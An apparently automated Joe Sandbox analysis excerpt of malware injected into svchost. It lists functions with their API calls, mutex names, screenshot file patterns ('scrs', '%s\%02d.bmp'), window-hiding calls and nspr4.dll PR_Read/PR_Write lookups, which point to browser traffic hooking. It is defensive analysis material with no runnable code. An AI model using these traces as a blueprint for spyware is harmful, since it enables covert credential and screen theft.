                                                                                                                                                                                                                    Function 02C909A0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C909CA
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A0C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90A18
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90A1C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A2D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C90A34
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90A63
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90A69
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90A6D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90A7E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C90A85
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C90ABA
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C90AD0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bf841$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-3898981795
                                                                                                                                                                                                                    • Opcode ID: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
                                                                                                                                                                                                                    • Instruction ID: 9adedc9061a233322b623d4569dee6cd3ded6863e4bc389879186b729274d846
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 542c1874f4bc3e52dd528810bb4d1963d2f2196f39eb4ecada1477f36d36a40c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A310571E402985BDB219B749C5CBEBBBA8EF95300F4546D4EA89D3100DF70DA55CBA0
                                                                                                                                                                                                                    Function 02C8A150 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C8A17A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A1BC
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8A1C8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8A1CC
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A1DD
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8A1E4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8A213
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8A219
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8A21D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8A22E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8A235
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8A26A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8A280
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bfc59$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-2853034986
                                                                                                                                                                                                                    • Opcode ID: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                                    • Instruction ID: 81399e7e759840fcf260adc1e0ba70d5316192ef898cd4b424ea9abbfecd5d93
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6be01b82df11ddc65da618c02c39694b16699051bfaa5acf49fb64867bc43323
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70315871E002989BCB21EB349C98BEB7BA8EF85304F0486D5E989C3100DF30DA54CBA0
                                                                                                                                                                                                                    Function 02C91960 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C9198A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C919CC
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C919D8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C919DC
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C919ED
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C919F4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91A23
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91A29
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C91A2D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C91A3E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C91A45
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C91A7A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C91A90
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bf95c$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-3288211317
                                                                                                                                                                                                                    • Opcode ID: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                                    • Instruction ID: 97337809144342f5afb747c78701df50d7f1a3d8e6f0a197024a797b0774a99a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8ee8b92d7439d8aee7b7b41ec083de929fc90b976aed1a9591ea951ced87208
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34313571E402995FCB21DB34AC5DBEB7BA8AF85300F0946D4E989C3100DFB0DA58CBA0
                                                                                                                                                                                                                    Function 02C8E6E0 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E70A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E74C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E758
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E75C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E76D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E774
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8E7A3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E7A9
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E7AD
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8E7BE
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E7C5
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8E7FA
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8E810
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bfde3$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-579213346
                                                                                                                                                                                                                    • Opcode ID: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                                    • Instruction ID: c012ed745ce7834b89328ee85ffa25eefdb54afe5cdcc30dafb8a318effbca9e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06cebc02a5074d148f141090ae079b5a9de5b0e7e1b4cb22705ec0731ad908ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4314871D402985BC721EB349C58BEB77A8AF85704F0589D4FA85C3101DF70DA54CBA4
                                                                                                                                                                                                                    Function 02C91690 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C916BA
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C916FC
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91708
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C9170C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9171D
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C91724
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C91753
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C91759
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C9175D
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9176E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C91775
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C917AA
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C917C0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7F1BF8F3$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-197625633
                                                                                                                                                                                                                    • Opcode ID: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                                    • Instruction ID: d0669bbe0d88d5412a30cdd21ac2ea9879cccbf1a7e9ba89ea04bb6e565d3bca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba8445a1f94566e55d1cd96c645874cd34b7fa93c6c2f41fc11f26e518bfdf13
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3310771D4029A5BCB119B749C5DBEB77E8EF85700F4846D4EA89C3100DF71DA55CBA0
                                                                                                                                                                                                                    Function 02C8F620 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfddb), ref: 02C8F64A
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F68C
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F698
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F69C
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F6AD
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F6B4
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F6E3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8F6E9
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8F6ED
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F6FE
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8F705
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8F73A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8F750
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bfddb$scrs
                                                                                                                                                                                                                    • API String ID: 224938940-1126418628
                                                                                                                                                                                                                    • Opcode ID: 35d3f24ee474b8a154757338705ddac402c16e5e072ae1be3ed9d89c386b56e7
                                                                                                                                                                                                                    • Instruction ID: 33ba1aa2bca3817b726cdd523b38e0fc18711386a38419310ee17da1da5b38a0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35d3f24ee474b8a154757338705ddac402c16e5e072ae1be3ed9d89c386b56e7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED314C71D002985BD722EB749C58BEB7BE8EF84304F4486D8E985D3100DF70DA59CBA0
                                                                                                                                                                                                                    Function 02C7B649 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 101sleepwindowthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000005), ref: 02C7B5BD
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 02C7B5C0
                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 02C7B5C5
                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 02C7B5D4
                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 02C7B5E7
                                                                                                                                                                                                                    • GetClassNameA.USER32(00000000,?,00000101), ref: 02C7B609
                                                                                                                                                                                                                    • GetWindowInfo.USER32(00000000,?), ref: 02C7B675
                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,?), ref: 02C7B697
                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02C7B6A6
                                                                                                                                                                                                                    • GetClassLongA.USER32(00000000,000000E6), ref: 02C7B6AF
                                                                                                                                                                                                                    • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02C7B6C2
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 02C7B6CA
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,02C7B530,00000000), ref: 02C7B6D8
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000003), ref: 02C7B6E1
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 02C7B6EF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ClassLong$SleepVisible$AttributesChildEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                    • API String ID: 3510281082-4251816714
                                                                                                                                                                                                                    • Opcode ID: 0bfcfc3708f5875f3a5ef9a59b9a8bcfabd5fc2b1915eb7716a2c70c28197be6
                                                                                                                                                                                                                    • Instruction ID: f0ecb02aec1f7eb1ce84d6a1a970ddf49098eaf1fd3417fdd5b4e5ac0b340f7f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bfcfc3708f5875f3a5ef9a59b9a8bcfabd5fc2b1915eb7716a2c70c28197be6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD31E130A90655AFEB2A9B64DC4AFAE7A2CEF45749F000744F612A20C0DB749E11CA65
                                                                                                                                                                                                                    Function 02C90AF0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C90B1C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C90B2D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B41
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B4F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C909A0,00000000,00000000,00000000), ref: 02C90B64
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C90B75
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C90B7A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C90B8E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90B9C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C90BA7
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf841,RAIFF), ref: 02C90BC1
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C90BCA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf841$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RAIFF
                                                                                                                                                                                                                    • API String ID: 505831200-2004234703
                                                                                                                                                                                                                    • Opcode ID: 7f78a7c3451d5d4f5334f9850f786c9ae6d7ba5abe8ba875d4bdfd9d4428052f
                                                                                                                                                                                                                    • Instruction ID: e6b70bb27d61c34d8a9be23afc102e9d7ab718ba819a6fa34f7ce02b850e8a58
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f78a7c3451d5d4f5334f9850f786c9ae6d7ba5abe8ba875d4bdfd9d4428052f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE11B630AC9755BAF7126B658C1EF1E37DC5F44B19F104654F551A30C1EBF0E9008AAA
                                                                                                                                                                                                                    Function 02C91AB0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 67sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02C91ADC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91AED
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B01
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B0F
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C91960,00000000,00000000,00000000), ref: 02C91B24
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C91B35
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C91B3A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91B4E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91B5C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C91B67
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bf95c,RSTYLE), ref: 02C91B81
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91B8A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7f1bf95c$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$RSTYLE
                                                                                                                                                                                                                    • API String ID: 505831200-2899104252
                                                                                                                                                                                                                    • Opcode ID: a4a3d1e9f6ed5d70f24a0a013588e84c90c1aa0e7e619a67d40516cb74c0f158
                                                                                                                                                                                                                    • Instruction ID: b08893210dbc9ebcc0b73e871e23fbd590f2a43a74c877046b024da61a8c4ed2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4a3d1e9f6ed5d70f24a0a013588e84c90c1aa0e7e619a67d40516cb74c0f158
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C11E630AC47537BF6126B658C0FF1A369C9F81B64F184654F919620C1EBF4A9008A7B
                                                                                                                                                                                                                    Function 02C7EEB0 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(nspr4.dll,00000000,00000000,00000000,02C84822), ref: 02C7EEBA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 02C7EED7
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 02C7EEF3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 02C7EF0F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 02C7EF2B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 02C7EF47
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 02C7EF54
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 02C7EF61
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7622F550,00000000,7693BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                                      • Part of subcall function 02C88FC0: VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Virtual$Protect$AllocLibraryLoadmemcpy
